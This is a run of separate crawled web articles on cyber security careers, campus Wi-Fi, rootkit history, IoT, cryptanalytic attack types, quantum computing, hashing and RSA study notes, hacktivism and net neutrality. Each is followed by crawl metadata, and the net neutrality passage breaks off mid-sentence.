a career path, compared to 12% of men. More women than men felt they were unqualified for cyber security programs and courses, and women were more likely to report that no teacher or guidance counselor mentioned the career track. Clearly, younger generations need more exposure to the field of cyber security. Courses that offer hands-on experience with analysis and problem-solving can go a long way, as can career opportunities for young people to interact with real-world cyber security professionals. The risks presented by cyber crime are enormous — threatening businesses, government agencies and individuals alike. As such, the need to train, attract and retain the next generation of cyber security professionals is greater than ever. The Lunarline School of Cyber Security offers opportunities for professionals of all levels to learn cyber security principles in a way that’s hands-on and interactive. For more information on the courses and certifications we offer and our approach to education, visit SchoolofCyberSecurity.com or contact us today.
<urn:uuid:9fdef1a7-360a-4f7d-a08c-0bd98c8d7c27>
CC-MAIN-2017-04
https://lunarline.com/blog/2015/11/4-reasons-millennials-overlooking-cyber-security-careers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00414-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954949
610
2.578125
3
In 2006, Santa Clara University began rolling out a Wi-Fi network as a way to supplement the school's existing production network. The initial deployment consisted of about 800 Cisco Aironet 1131 a/b/g/ access points and Cisco WiSM controllers. As expansion or renovation projects occurred, the school added some 802.11n access points, but until recently 90% of the roughly 70 buildings on campus were equipped with the older, slower technology. Todd Schmitzer, network and telecommunications manager at SCU, says the original Wi-Fi network was designed to provide expanded convenience' access to the campus network from academic, administrative, and residence hall locations. It was never intended as a production network or the sole mechanism for people to access the campus network. It did not cover all locations (only the common occupied spaces), did not provide for high-density use (classrooms, theaters, dining halls), or provide nearly the bandwidth of the wired network. To continue reading this article register now
<urn:uuid:8cf0580f-7f67-4054-abcd-3d0259361edb>
CC-MAIN-2017-04
http://www.computerworld.com/article/2487336/networking/case-study--santa-clara-u--graduates-to-gigabit-wi-fi.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00138-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951782
203
2.671875
3
Kaspersky Lab, a leading developer of secure content management solutions, announces the release of the article "Rootkit Evolution" by Alisa Shevchenko, a virus analyst at the company. This article by Alisa Shevchenko is the second in a series devoted to the evolution of viruses and antivirus solutions. The author defines rootkits as "programs that evade or circumvent standard system mechanisms by using stealth techniques to hide system objects, such as files, processes, etc." and provides an overview of rootkit evolution from their first appearance to the present day. The article is aimed at readers with some technical knowledge who require the historical background to a topic currently widely discussed in the IT security industry. It focuses on Windows rootkits: as Windows is the most widely-used operating system, rootkits targeting this system are the most commonly used by virus writers. Although the term rootkit has its origins in the UNIX world, contemporary Windows rootkits actually stem from the DOS stealth viruses which first appeared in the 1990s. These viruses were designed to hide themselves from the user and from AV programs; it was only later that these techniques were used by Windows rootkits to hide other malware. Windows rootkits made their appearance approximately ten years after DOS stealth viruses, and the author provides an overview of their origins, the first implementation of such programs, and their functionality. Once it became clear how rootkit technologies could be developed, these technologies started being incorporated into a wide range of malicious programs. However, initially the number of malicious rootkits and the ways in which they were applied was relatively small. By 2005, the use of rootkit technologies was widespread; media attention was drawn to the issue, and found that these technologies were not only used in malware, but also, seemingly, in commercial products. One example of this was the Sony DRM scandal in 2006. Both the AV industry and independent researchers responded to the use of rootkit technologies and produced a large number of technologies, products and tools designed to combat rootkits. The article addresses recent trends such as bootkits (rootkits which run during the boot sequence); a 'mythical' rootkit called Rustock.c, which was discussed widely on the Internet towards the end of 2006; and rootkits for non-Windows systems such as OS X (Macintosh) and mobile operating systems. The author concludes that although "rootkits…no longer cause any particular excitement…the concept of evading systems is obviously still valid and we are very likely to see new threats implementing stealth technologies". The full version of the article is available at
<urn:uuid:acf277d4-7aee-4162-b40c-ca446eaf54b3>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2008/Kaspersky_Lab_announces_the_publication_of_the_analytical_article_Rootkit_Evolution_
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00046-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965082
539
2.8125
3
Chemical firms are embracing the Internet of Things, and in doing so, they are making new partnerships possible. Technology improvements allow firms to partner with companies in many fields. With chemical manufacturing’s thin profit margins, these partnerships make prudent business sense. Energy and tech firms are new potential partners, as are equipment makers. Firms with vision see possible ties with customers and subcontractors as well. The Internet of Things (IoT) is driving these new connections. The IoT refers to the use of sensors, computers, and wireless connections to connect physical objects to each other. By 2020, it’s estimated that between 30 billion and 50 billion objects will be connected. These connected objects will automate processes, find and self-correct problems, and record and send data to central servers. All of this data can be analyzed to modify and improve products and processes. The Internet of Things and the chemical industry As the cost of sensors and storage drops, so do the barriers to entry into the many possibilities available to the chemical industry. The technologies allow improved product security and safety. With connected products, processes, and people, firms can improve performance, minimize supply chain issues, and improve product quality. Let’s take a closer look at some of the possibilities and partnerships these smart technologies offer. Downtime and unplanned maintenance are common issues in the chemical industry. Smart technology is solving those issues through the use of sensors that track quality and performance. Computers are raising or even addressing issues in real time to reduce equipment breakdowns. Equipment is more effective and maintenance is more efficient. Connected devices generate vast amounts of data. Powerful analytics programs can interpret that data to improve quality. Augmented reality uses 3D visualization tools to improve maintenance and service. Take, for example, the issue of batch quality. Most chemical makers can only assess a limited number of batches at a time. Big Data tools now enable thousands of batches to be analyzed together. This metadata lets companies improve production processes, yield rates, order fill rates, and per-batch costs. Farmers today want to use chemicals in precise ways to produce higher yields. This “precision farming” requires a trusting partnership among many vested partners. Farmers need to work with agribusiness suppliers and chemical makers. Tech firms, equipment makers, and traders are also key players. Successful precision farming requires tech platforms to handle large amounts of data. All stakeholders need to be able to access the data and collaborate in a secure virtual environment. How does it all work? Imagine a system where sensors are constantly measuring soil quality. Data on water, nutrients, and pesticides are recorded and correlated. Analytics predict weather and its impact on a crop and adjust the rates and amounts of applied materials. Yields and quality are tracked and analyzed to find optimal ratios. Overlaid pricing and expense models recommend crops with the highest possible profit margins. The results are significant in many areas. Farmers are more profitable. More people are fed with less environmental impact. Manufacturers improve future versions of equipment, seeds, and chemicals. Reducing friction along the logistics chain is much improved with the IoT. Sensors and RFID tags can ensure products remain quarantined or in specific locations. Contamination and attacks, either physical or cyber, can be detected faster and authorities alerted. Dispatchers can track transportation fleets in real time to predict and track deliveries. Warehouse operations become far more efficient with these newer tools. With virtual reality, users can “see” products in real time, reducing the need for warehouse pick lists. Trackable specs and expiration dates can improve the efficiency of picking, packing, and put-away work. Data analysis can reveal the best use of available space and how to coordinate with suppliers on receivables. Reducing energy expenses Energy usage and regulatory controls are significant costs for most chemical manufacturers. IoT devices can address both concerns. Installed sensors track energy usage and predict outages. Collected data ensure and verify regulatory compliance. Analytics identify usage patterns and inefficiencies. Firms can make better decisions about energy purchases. Conservation measures can be identified. Not only do these tools offer cost reduction, they create greener operations. Developing a strategy So how do chemical firms develop a strategy that allows for these complex partnerships to develop and persist? Here are six considerations. Innovate: Rapid advances in mobile. cloud and Big Data technologies are bound to continue. Firms that embrace these technologies and infuse them in planning are likely to take the lead and increase market share. Think green: Whether your firm is B2B or B2C, IoT products can lead to greener outcomes and add marketable value to your line. Global view: Connected supply chains, distribution, and products allow for a global operational perspective as well as global business opportunity. Data and analytics: With more connected products comes more data. Chemical firms need to address storage capacities and tools to crunch all those numbers. Fortunately, cloud-based storage costs continue to drop and Big Data analytics tools are becoming more robust. Infrastructure partners: Hardware, software, sensors, applications, telematics, and mobile devices are a part of your business now. View the vendors as strategic partners. Collaborate with them on new products and procedures. Vigilance: Threats of attack and contamination are all too real in the chemical industry. Today firms need to also consider customer data protection and privacy. One downside to IoT is the proliferation of products that can be hacked, stolen, or tampered with. Smart products provide extraordinary opportunity in the chemical industry. Firms that embrace the need to change and find vertical and horizontal partners will be well positioned. Rich data will allow for better-informed decisions on operations and revenue opportunities. Start your journey now! Learn more about the value digital transformation brings to your company and establish the right platform and road map for transition. About Stefan Guertzgen Dr. Stefan Guertzgen is the Global Director of Industry Solution Marketing for Chemicals at SAP. He is responsible for driving Industry Thought Leadership, Positioning & Messaging and strategic Portfolio Decisions for Chemicals.
<urn:uuid:ce94318c-23a5-4c9f-a270-5e5733f72fd2>
CC-MAIN-2017-04
http://www.ioti.com/industrial-iot/chemical-industry-4-opportunities-provided-internet-things
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00440-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919074
1,272
2.6875
3
More and more devices are getting sensors embedded in them to sense their current state of internal and external status. There are many examples like intelligent energy saving lighting systems, keyless entry systems in a car, internet enabled microwaves, refrigerators, home security systems, automatics focus or illumination detection in cameras, temperature and air-conditioning control in rooms, global position location systems in cell phones, other location sensors, smart cards for keyless entry systems, credit cards etc. Sensors and sensory devices are also commonly attached or embedded in living beings for monitoring or supporting life like the pacemakers that detect the arrhythmic heart beat and compensate for the same, drug delivery systems for pain relief in terminally ill patients, monitoring systems in people released on payroll, alarm systems put on elderly or very yong to enable near and dear ones to monitor any sense of distress in them. Imagine if all such sensors existed in all living beings and non living were objects and were connected online and available 24 by 7 on a mobile device using internet and we had unlimited or secure and restricted access to all this information to leverage as per authorizations. The possibility of leveraging this information for decision making in real world will open unlimited possibilities for newer applications and provide a huge amount of comfort and relieve humans of many mundane activities. This is the concept of internet of things. It has already started to attract attention for many large leading companies. Companies are working on making sensors which can be embedded or attached in all living beings and non living objects and gather their conditions and be ready to communicate with the rest of the world. Companies are working on embedding such devices in objects or implants in living beings. Companies are working on creating communication protocols for connections with the internet. Companies are working on integrating this information and accessing them on the web with user owned devices to leverage the same. Applications are many. An property and casualty insurance company can integrate tsunami, hurricane, storms sensors with the demographic information of properties to assess likely impacts and issue preventive action warnings to their insured. Life insurance companies can monitor medication and conditions of elderly and elongate life spans. Motor insurance companies can view driving patterns of drivers as well as advise personal insurance plans. The cars can regulate and detect possible collision scenarios and navigate themselves out of the same. One can manage and operate all home appliances from remote or automate the operations based on alarms and thresholds set. This is the new world of internet of things where the level of automation is such that lot of human interventions will only be to define the rules and leave all regular operations to the sensors and devices of the world.
<urn:uuid:d7ffb936-401e-4ad2-81dc-ebcdec9a4925>
CC-MAIN-2017-04
https://www.hcltech.com/blogs/rsodhi/leveraging-eco-system-internet-things
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00258-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939471
525
2.8125
3
2.4.2 What are some of the basic types of cryptanalytic attack? Cryptanalytic attacks are generally classified into six categories that distinguish the kind of information the cryptanalyst has available to mount an attack. The categories of attack are listed here roughly in increasing order of the quality of information available to the cryptanalyst, or, equivalently, in decreasing order of the level of difficulty to the cryptanalyst. The objective of the cryptanalyst in all cases is to be able to decrypt new pieces of ciphertext without additional information. The ideal for a cryptanalyst is to extract the secret key. A ciphertext-only attack is one in which the cryptanalyst obtains a sample of ciphertext, without the plaintext associated with it. This data is relatively easy to obtain in many scenarios, but a successful ciphertext-only attack is generally difficult, and requires a very large ciphertext sample. A known-plaintext attack is one in which the cryptanalyst obtains a sample of ciphertext and the corresponding plaintext as well. A chosen-plaintext attack is one in which the cryptanalyst is able to choose a quantity of plaintext and then obtain the corresponding encrypted ciphertext. An adaptive-chosen-plaintext attack is a special case of chosen-plaintext attack in which the cryptanalyst is able to choose plaintext samples dynamically, and alter his or her choices based on the results of previous encryptions. A chosen-ciphertext attack is one in which cryptanalyst may choose a piece of ciphertext and attempt to obtain the corresponding decrypted plaintext. This type of attack is generally most applicable to public-key cryptosystems. An adaptive-chosen-ciphertext is the adaptive version of the above attack. A cryptanalyst can mount an attack of this type in a scenario in which he has free use of a piece of decryption hardware, but is unable to extract the decryption key from it. Note that cryptanalytic attacks can be mounted not only against encryption algorithms, but also, analogously, against digital signature algorithms (see Question 2.2.2), MACing algorithms (see Question 2.1.7), and pseudo-random number generators (see Question 2.5.2).
<urn:uuid:b5d9370d-b815-42d9-ae10-1663ae8e6527>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/basic-types-of-cryptanalytic-attack.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00074-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92297
473
3.296875
3
The CEO of a quantum computing company walked onto a stage at MIT and stood in front of an audience of professors, engineers and computer scientists. Vern Brownell, CEO of D-Wave Systems Inc., looked out at the crowd and said, "I cannot explain how quantum computing works." Was he heckled? Did attendees get up and leave? No. No one in the audience stirred. There was no murmuring. Nobody laughed. No sidelong glances. Nothing. Quantum computing is just that confusing. Some of the world's best physicists don't understand how it works. Nobel Laureate physicist Richard Feynman is widely quoted as saying, "If you think you understand quantum mechanics, you don't understand quantum mechanics." Despite how complex the idea of a quantum computer is and the fact that some physicists say we're as much as 50 years away from seeing one, D-Wave, a quantum computing company based in Burnaby, British Columbia, said it is building them. NASA, Google and Lockheed Martin are testing them. "If you want to buy a quantum computer, I can sell you one today," Brownell said at an MIT Tech Conference in February that focused on disruptive technologies. Those kinds of statements have created a buzz in both the world of physics and the world of computing because many believe quantum computing holds a lot of promise. It's like the Holy Grail of supercomputing. Think of a computer that could surpass the top classic supercomputers in some calculations, especially problems where you have to search through a lot of data, finding answers to questions so complex that machines like IBM's Blue Gene and Cray's systems might need hundreds of years to solve, or might never solve them. D-Wave CEO Vern Brownell Quantum computers might help researchers seeking cures for cancer, advance cryptography or find distant planets. They also could be used to simulate political and military situations, such as the unrest in Ukraine, enabling researchers or a government to test different options and see how they would affect the outcome. Quantum computers rewrite the rules of how computing works. Classic computers use bits -- ones and zeroes -- for processing instructions, and they work based on a series of instructions. Ask the computer a question, and it will move through the calculation in a linear, orderly way. A quantum computer combines computing with quantum mechanics, one of the most mysterious and complex branches of physics. The field was created to explain physical phenomena, like the odd actions of subatomic particles, that classical physics fails to do. One of the rules of quantum mechanics is that a quantum system can be in more than one state at once. But that concept goes against what's known of the world. Something can be green or red but it cannot be green and red at the same time. That's not the case with quantum mechanics. Each bit in a quantum machine -- known as qubits -- can be both a one and zero. It's about possibilities. When a qubit is constructed, it's built so you don't know if it's a one or a zero. It has the possibility of being both. The D-Wave system with the 512 qubit chip is being tested by NASA and Google. (Photo: D-Wave) It's not known what those qubits are until they begin to interact - or entangle - with other qubits. Based on their entanglements, they become a one or a zero. However, just because a qubit acted as a zero during one calculation, doesn't mean it will act as a zero during the next calculation. It goes back to the original possibility. WPI Prof. Germano Iannacchione That's where the quantum computer's power comes into play. A quantum system doesn't work in an orderly, linear way. Instead, its qubits communicate with each other, through entanglement, and they calculate all the possibilities at the same time. That means if a quantum machine has 512 qubits, it's calculating at 2 to the 512th power at the same time. That number is so immense that there are not that many atoms in the universe, according to Rupak Biswas, chief of NASA's Advanced Supercomputing Division. Some physicists theorize that all those calculations are being done in different dimensions. "We're so far outside of our everyday experience," said Germano S. Iannacchione, head of the Physics Department at Worcester Polytechnic Institute. "Common sense doesn't guide us here. We're trying to come up with pictures in our heads of how it works. When you're at the hairy edge of the unknown in physics and you don't have experience and common sense to guide you, you have to rely on the math. That's the only thing you can hold on to." Despite the complexities, D-Wave's Brownell said his company has built quantum computers, using their own quantum processor built with different metals, such as niobium, a soft metal that becomes superconducting when cooled to very low temperatures. One machine, the D-Wave Two, leased by the Universities Space Research Association, is based at NASA's Ames Research Center in Mountain View, Calif. NASA has use of the machine 40% of the time, Google has another 40% and the research association has 20%. Google declined to talk about its work with the system. However, its experiments on the computer have led to debate on whether D-Wave's computer performs any better than classic computing or whether it is a quantum computer at all. NASA, which has had its hands on the D-Wave Two since last September, has only been testing it, Biswas said. His group has been doing high-performance modeling and simulation on problems related to Earth sciences, aeronautics and deep space exploration. "We're still in the early stages," said Biswas, but added that testing is going well. "We are trying to see what it can do. It's not a turnkey situation. It's a very exotic field. It's like in the early days of computing when we had computers with vacuum tubes and card readers." D-Wave's system at NASA may be the first commercially available quantum computer, but it's not the first quantum machine. Basic quantum computers have been built before. In 2000, scientists at the Los Alamos National Laboratory demonstrated a working 7-qubit system. In 2011, Brownell said, D-Wave, to prove it was on the right track, built a quantum computer running 8 qubits. However, the company hasn't proved that its 512-qubit machine works as a quantum computer, and that's because, he said, it simply can't be proven. "These are such complex systems they can't be modeled by all the computers in the world put together," Brownell said. "That will never be completely provable." Paul Benioff, who is credited with being the first to apply the theories of quantum mechanics to computers in the early 1980s while working at the Argonne National Laboratory, is doubtful that D-Wave has built a true quantum computer. "We're a long ways away," he told Computerworld. "It won't happen in my lifetime and I don't intend to die tomorrow." Benioff says it could be 20 to 50 years before anyone is able to get a lot of qubits to work together. "It's not hard to build [a qubit], but how do you build a whole lot of them and have one over here interact with one way over there?" he asked. "There are a lot of questions out there about whether they are full quantum computers. It could be a step there or it's an offshoot of the right way to go." Iannacchione agrees that D-Wave's system is likely a step toward building a real quantum computer. "They haven't demonstrated the ability to do these huge calculations," he said. "There's no clear evidence that what D-Wave is doing is faster than what a classical computer can do. If they really are creating a quantum computer, it should be hugely faster even if we don't understand what is going on under the hood." That is what is making many people, in both physics and computer science, skeptical about D-Wave's machine. This is so new and out-of-the-box, that they're not even sure if a true quantum computer has been built. And having a quantum computer won't be as easy as adding more racks to a company's data center. A quantum computer has to be completely isolated from everything from radiation to light, heat and even vibrations. It also has to operate at 458 degrees below zero Fahrenheit. "It's the world's most delicate souffl," said Iannacchione. If it's difficult to find software to take advantage of computers running multi-core chips, finding software to run on a quantum machine would be a much bigger issue. Despite the doubts and difficulties associated with quantum computing, Brownell maintains that D-Wave is the first to build a commercial quantum computer that can do large, useful calculations. "The most complex thing ever done by a quantum computer before ours was factoring the number 21 in a laboratory," he said. "This is one of the most important things to happen in computer science in the last 50 years. This becomes a whole new branch of computer science." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com. Read more about high performance computing in Computerworld's High Performance Computing Topic Center.
<urn:uuid:18cada6a-4484-47a6-91e5-55a0f09c8f0d>
CC-MAIN-2017-04
http://www.computerworld.com.au/article/540764/quantum_rewrites_rules_computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00560-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965737
2,028
3.078125
3
I'll be taking another practice test soon... Hashing and HMACs: A cryptographic function that produces a hash sum that radically differs if the input is slightly changed. A hash collision, or “hash clash,” occurs when two different inputs produce the same hash sum output. A HMAC uses a hash to securely transport a secret key. Hash Applications: Hashing algorithms are used to verify the integrity of transmissions and passwords. • 128-bit hash value typically expressed in a 32-character hexadecimal number • 4 rounds of 16 operations for a total of 64 operations • Created by Rivest of MIT • Random data bits (salt) should be added to password before they are hashed with MD5. Rainbow Tables: RBTs are used to map hash outputs into strings. Slating makes RBTs less effective. Secure Hash: A has is considered to be secure if: • It is computationally impossible to find the message that corresponds to a digest • No two different messages produce the same hash value. • Widely used in application such as TLGS, SSL, PGP, SSH, S/MIME, and IPSEC. • A small change in input will produce a drastically different hash output. • 224, 256, 384, and 512 bit versions have been published by NIST • Vulnerable because of weak file processing steps and certain math operations in the first 20 rounds. Digital Signatures and PKI: Hashing and asymmetric encryption can be combined to provide encryption and authentication. These attributes are especially effective when implemented in a Public Key Infrastructure System. Hashes and Digital Signatures: A message can be encrypted with another user’s public key. A signature is then hashed and encrypted with the sender’s private key. If both users have exchanged their public keys, the recipient will be able to decrypt the message with his public key and the signature with the sender’s public key. The hash of the signature can then be recomputed and the message’s integrity verified. A Digital Signature Scheme is compose of three algorithms: • Key generation algorithm to generate a user’s public/private key pair • Signature algorithm that signs the message with a signing key • Signature verification algorithm with verifying key RSA: RSA uses public/private key cryptography. It is typically 1024-2048 bits long. RSA Message Signing: • The sender creates a hash for the message and raises it to the power of d mod n. • The hash value is attached to the message • The recipient raises the signature to a power of e mod n. The same procedure was performed when the message was encrypted. • The hash value is compared and integrity is verified. • Timing Attacks: Measuring the decryption times and comparing them to known cipher texts. Set times and blinding, in which the multiplicative property is used so that timing is insignificant, are two methods used to combat timing attacks. • Adaptive chose cipher text attack: Exploits flaws in the PKCS#1 scheme to recover SSL session keys. Addressed by RSA in a PKCS#1 update. • Branch Prediction Analysis (BPA): Attempts to statistically discover private keys by observing simultaneous multithreading patterns. DSA Algorithm: DSA is used to generate digital signatures and verify authenticity. In a DSA scheme, a user must be aware of the sender’s private key. DSA requires that keys be bound to users.
<urn:uuid:1edfba05-0ac4-441e-9c19-74b37b5173f7>
CC-MAIN-2017-04
http://networking-forum.com/viewtopic.php?p=175365
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.880416
733
3.734375
4
This month (December 2010) has seen the mainstream media alive with stories of hacktivists attacking payment websites, including Visa, MasterCard and PayPal, in response to those organisations' refusal to take payments in support of the WikiLeaks website. Every day we hear stories of cybercriminals stealing money and cyberterrorists causing mayhem, alongside state sponsored cyberwarfare as nations battle it out on line. The reality is more complicated. Whilst these stories make good headlines the truth is often more disturbing; but what exactly is the truth behind cybercrime, cyberwarfare, cyberterrorism and hacktivism? What do you need to know and what do you need to do to deal with the problem? Cyberspace, cybercrime, cyberterrorism, cyberwars and hacktivism Most people would agree that the internet and the world wide web is generally a force for good. The free flow of information, ideas and commerce have taken a basic tool for sharing research data and propelled it into being a vital part of every day life. Hoever, like all aspects of life there is a darker side, and so it is with the internet. Criminals and malcontents are always looking for new ways to build income or conduct their activities and the internet gives them, on a plate, opportunities that few could have imagined. Cyberspace is a term that was originally coined by William Gibson in 1982 and was made popular in his novel released two years later called Neuromancer. Cyber has now captured the public’s imagination as the term to use when referencing a whole host of activities taking place on the internet: - Any crime that takes place within cyberspace is now deemed to be a cybercrime - Interstate information battles are now deemed to be cyberwars - …and terrorists are now able to conduct cyberterrorism from the comfort of their own homes The scale of cybercrime is difficult to assess. What is certain is that for many people it is a real and present problem, but remains under-reported to the authorities for reasons of embarrassment, ignorance or a lack of faith in the authorities to investigate any possible offences. Some organisations have attempted to gauge the problem; in 2008 the ACPO (UK-based Association of Chief Police Officers organisation) National Strategic Assessment stated “Online fraud generated £52 billion worldwide in 2007” (ACPO, 2008) and in 2004 the global cost of malware and viruses was estimated at “between $169bn and $204bn” (BNAC, 2007) In contrast, cyberterrorism has been defined by the US National Infrastructure Protection Centre, now part of the Department for Homeland Security as, ”a criminal act perpetrated through computers resulting in violence, death and/or destruction, and creating terror for the purpose of coercing a government to change its policies” (Wilson, 2003). Herein lays an interesting debate. I would suggest that we see very few criminal acts that truly fit into this definition. The often-cited examples of the Estonian and Georgian governments, attacked in 2007/8 as part of a ‘cyberwar’, could arguably be categorised as aggressive hacktivism rather than cyberterrorism as defined by the Department for Homeland Security—and certainly not cyberwar. Indeed, latest research indicates that the attacks, which affected some government agencies, emanated from hackers based in Russia acting on their own initiative rather than being a state sponsored punch up. So when does cybercrime become cyberterrorism, and where does online protesting, often called hacktivism, come into play? Hacktivism is a portmanteau word—combining hacking and activism in one term. It means the use of digital tools in the pursuit of political ends and normally results in a plethora of mainly annoying attacks such as defacement of websites and the stealing of low-level information. Rarely does it result in what could be described as cyberterrorism. That said, there is no doubt that aggressive hacktivism is on the rise. In January 2009 the United States Department of Homeland Security released an internal intelligence and assessment document entitled “Leftwing Extremists Likely to Increase Use of Cyber Attacks over the Coming Decade” that was subsequently put into the public domain by the Federation of American Scientists. In this document is a very telling quote from an unnamed radical activist group, “…in today’s technological age, computer systems are the real front doors to companies. So instead of chaining ourselves together in the physical doorways of businesses we can achieve the same effect from the comfort [sic] our armchairs….” Computers now form a new front line for such groups. As many in law enforcement know, when radical groups carry out direct action such as rushing through a targeted organisation’s front reception to access their offices the criminal damage that takes place is often a mask for a more sinister attack such as the planting of key logging devices or the download of data masked by the cacophony of the direct action. Less visible are the attacks that these groups execute across the internet. We are now seeing political activists using the same hacking tools and technologies as cybercriminals. There are no boundaries to the use of technology to meet their objectives—the only limit appears to be the imagination of the criminal, hacktivist or terrorist group. The next article in this series will cover the use of the internet by radical groups and the sinister use of open source intelligence gathering. ACPO. (2008). National Strategic Assessment. ACPO. BNAC. (2007). British-North American Committee, Cyber Attack: A Risk Management Primer for CEOs and Directors. BNAC. Wilson, C. (2003). Computer Attack and Cyber Terrorism: Vulnerabilities and Policy Issues for Congress. CRS Web. Federation of American Scientists. Leftwing Extremists Likely to Increase Use of Cyber Attacks over the Coming Decade. Available at http://www.fas.org/irp/eprint/leftwing.pdf Last accessed 9th December 2010
<urn:uuid:91e752f4-c9e7-43b6-a2bd-c33af5262bdf>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/cybercrime-cyberwars-cyberterrorism-and-hacktivism-p1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950644
1,239
2.96875
3
With programs such as iCloud, Evernote, and Expensify becoming ever more popular, and people beginning to store more and more of their personal information on the web, those using cloud computing are beginning to wonder whether or not their information is as safe as they originally believed. Sites that use dedicated server colocation or dedicated server hosting are not completely insusceptible to hacks, but as far as the storage of information goes, they are some of the safest types of hosting to use on the market. Larger sites though, such as Facebook and Google, have their own data centers in which they keep all information stored. The issue with having all of your information saved in a cloud isn’t exactly the risk of a hacker breaking in and stealing all of your information, it’s what large companies, like Facebook and Google, might do with all of that information stored. Facebook has come under fire for repeating violating user rights be distributing user data, and Google has openly stated that it is opposed to privacy. However, both claim that users have full control of their data; that they retain ownership of everything that is uploaded. Google states that it “does not claim any ownership in any of the content…that you upload,” and Facebook states that “You own all content and information you post on Facebook.” However, user rights are still violated, and users continue to question the state of their online privacy. Technically, the U.S has no legitimate data privacy or cloud regulation laws. It’s essentially a minimally enforced free-for-all. Since nothing truly prohibits companies from behaving badly, they do what they will with the information on their sites until someone raises a fuss about it. They say that it is better to do now, and ask for forgiveness later, but should this be the case with personal information? Until the FTC and other global companies that regulate online issues form strong laws, cloud users should simply be aware of the companies they are choosing to use and be wary of putting all information on the web. While no one should necessarily give up Facebook or abandon their Gmail, they may want to consider what information they are sending across the web. Always ask yourself who owns the data after you upload it. Check out company policies. Make sure that your data won’t be used for research you don’t approve of or that you’ll receive a copyright infringement suit should you use your own content again later. Also reconsider storing all confidential documents on the web. While clouds are fairly secure, they are better for storing music and photo files, not social security numbers, old tax forms, etc. There is no doubt that stricter regulations will be imposed on companies utilizing cloud computing for their sites. However, cloud computing is still too new to have any definites. Until then, just remain aware of what you are putting on the web, and you should be okay. This content provided by TheTechUpdate.com.
<urn:uuid:d0c0d214-3b7a-4ef2-b39b-cb99ac86bec8>
CC-MAIN-2017-04
https://www.404techsupport.com/2011/10/the-state-of-cloud-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00102-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960569
611
2.6875
3
Some people will tell you that the recent U.S. Court of Appeals ruling striking down the U.S. Federal Communications Commission's rules about Net neutrality was an unmitigated disaster for consumers and Internet innovation, and that over the long term it will quash innovation, cost consumers more, curtail competition, and put everyone at the mercy of big ISPs like Verizon and Comcast. The people who say that are only half right. The ruling was a disaster, but not quite an unmitigated one. Everything Net neutrality advocates say about the long-term effects of the ruling are likely true -- but there's still time to do something about it, if the FCC is willing to put up a fight. It's not clear yet whether the FCC will do that. To understand why the ruling is potentially so disastrous, let's take a step back and look at the court ruling. The concept of Net neutrality has governed the way the Internet has worked since its inception. It means that ISPs can't discriminate among the traffic they carry, treating it all equally. For example, they can't put YouTube traffic onto a fast lane, while putting the traffic of smaller, little-known competitors on a slow-as-a-snail lane. The idea is that all traffic is created equal, and all companies and consumers get an equal shot at using the Internet's pipes. Up until now, Net neutrality has governed the Internet because that was the Internet's founding ethos. But it has also worked that way because of a long-standing legal concept called "common carrier" that governs telecommunications and other services. Applied to Internet infrastructure, it means that all traffic must be treated equally. ISPs have long ached to change the rules of the game. They have advocated for being allowed to deliver traffic to consumers based on how much money websites pay them -- faster delivery for more money. The first crack in Net neutrality appeared a dozen years ago. In 2002, the FCC under President George W. Bush made a decision that led in a straight line to this week's ruling to strike down the FCC's Net neutrality rules. The FCC back then decided to classify broadband as an "information service" instead of a "telecommunications service." That's important, because information services are exempt from common carrier requirements, while telecommunications services aren't. Still, Net neutrality has ruled since then. Under President Obama, the FCC has been generally supportive of Net neutrality, and in 2010, it issued the Open Internet Order, which said that ISPs could not block traffic of any types of services and that it could not discriminate among traffic by putting some in a fast lane and some in a slow lane. Verizon challenged it, and this week a U.S. Court of Appeals struck it down, based on the FCC's 2002 decision to categorize broadband as an "information service." Judge David Tatel said that the Open Internet Order should be overturned because "the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers" -- in other words, as an information service, not a telecommunication service. What might be the effects of the ruling? Well-funded websites will be able to pay extra to have their traffic delivered speedily, making it much more difficult for startups and competitors to survive. In the long run, that means less competition and less innovation. Established services like Netflix will thrive because they'll be able to pay ISPs and pay big. Other services may wither and die, if they even get to start at all, because they'll be at a competitive disadvantage. Consumers may end up paying more for services. For example, if Netflix pays the ISPs to deliver video more quickly, Netflix will need to get that money from somewhere, and that will likely mean higher subscription fees. ISPs could also favor websites and services they own over others. Comcast, for example, owns NBC, and could give that network's websites and online services precedence over NBC's competitors. ISPs could black out entire websites and services. This isn't as far-fetched as it might seem, and there is already a precedent for it. Last summer, Time Warner Cable and CBS were locked in an exceedingly nasty financial dispute about Time Warner Cable's 